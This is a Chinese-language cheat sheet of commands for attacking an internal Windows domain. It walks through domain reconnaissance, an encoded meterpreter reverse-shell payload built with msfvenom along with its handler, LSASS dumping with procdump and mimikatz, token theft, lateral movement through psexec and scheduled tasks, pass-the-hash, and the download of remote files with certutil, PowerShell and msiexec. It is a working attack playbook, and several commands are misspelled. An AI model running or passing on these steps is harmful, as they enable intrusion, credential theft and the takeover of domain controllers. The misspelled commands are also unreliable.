初始内网域渗透

域信息收集-nltest信任域
信任域：可以在工作组里查询，查询内网里是否有域环境
nltest /domain_trusts /all_trusts /v /server:192.168.52.2
返回所有信任192.168.2.252的域。
nltest /dsgetdc:XXXXX /server:192.168.52.2
返回域控和其相应的IP地址，XXXXX是上步骤结果中的一个域

eg:
nltest的命令：
https://www.cnblogs.com/dreamer-fish/p/3473895.html

csvde的命令-----导出域用户信息
csvde -setspn hack -f c:\windows\temp\hack.csv

setspn的命令
setspn -T hack -Q */* | findstr IIS
setspn -T hack -Q */* | findstr MSSQL

dnsdump的命令
dnsdump.exe -u 域名\域用户 -p 域密码 域控机器名
dnsdump.exe -u hack\iis_user -p 1qaz@WSX windows_server_2016_dc -r

net的命令
net user/domain 获取域用户列表
net group "domain admins" /domain 获取域管理员列表
net group "domain controllers" /domain 查看域控制器（如果有多台）
net group "domain computers" /domain 查看域机器
net group /domain 查询域里面的组

net view 查看同一域内机器列表
net view \\ip 查看某IP共享
net view \\GHQ 查看GHQ计算机的共享资源列表
net view /domain 查看内网存在多少个域
net view /domain:XYZ 查看XYZ域中的机器列表

nbtscan的命令
nbtscan.exe 192.168.52.0/24

域渗透思路
横向渗透->权限维持->取密码（获取一个域用户账号密码） ->域信息收集 ->横向渗透 ->去面膜 ->获取域管权限 ->拿下域控服务器

横向渗透
使用弱口令密码工具，整体操作在截图文件中

权限维持
dll加载shellcode免杀上线

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp_uuid LPORT=9999 LHOST=192.168.1.1 -e x86/shikata_ga_nai -i 11 -f c -o shellcode.c

use exploit/multti/handler
set payload windows/meterpreter/reverse_tcp_uuid
set lhost 192.168.1.1
set lport 8888
set EnableStageEncoding true
set StageEncoder x86/fnstenv_mov
exploit

lsass读取内存hash
lsass进程获取内存hash

//在目标机子执行procdump.exe
procdump.exe -accepteula -ma isass.exe c:\windows\temp\isass.dmp

//在mimikatz中运行，结果保存在日志里
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

LaZagne取各种链接工具密码，浏览器保存密码
https://github.com/AlessandroZ/LaZagne

凭证窃取
通过tasklist /v查看进程用户，如果有域用户启的进程，则凭证窃取
incognito.exe list_tokens -u
incognito.exe execute -c "HACK\Administrator" cmd.exe

命令行渗透
下载上传命令
net use \\192.168.52.2 /u:hack\administrator Windows2019*** 建立IPC连接
net use \\192.168.52.2 /de /y 删除IPC连接
copy sbn.exe \\192.168.52.2\C$\windows\temp 复制本地文件打目标服务器
copy \\192.168.52.2\C$\windows\temp\hash.txt 复制目标服务器文件到本地

执行命令
schtasks(计划任务)
schtasks /create/tn task1 /U 域\域用户 /P 域用户密码 /tr 执行的命令或者bat路径 /sc ONSTART /S 域机子IP /RU system
schtasks /run /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码
schtasks /F /delete /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码

psexec
net use \\192.168.52 /u:hack\administrator Windows2019***
PsExec.exe \\192.168.52.2 -s cmd.exe -accepteula
-accepteula第一次运行会弹框，输入这个参数便不会弹框
-s以“nt authority\system”权限运行远程进程

hash传递
psexec.exe -hashes:用户Hash 域名/用户名@目标IP
psexec.exe -hashes:70a50725f6d2d03d00c24e946fde3 hack/administrator@192.168.52.2

命令行下载文件
1.powershell(win2003、winXP不支持)
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.101/test.txt','c:\test.txt')
2.Certutil
certutil.exe -urlcache -split -f http://192.168.1.1/test.txt file.txt
3.bitadmin
bitadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt
bitadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt
4.msiexec
msiexec /q /i http://192.168.1.1/test.txt
5.IEExec
caspol -s off
IEExec.exe http://192.168.1.1/test.exe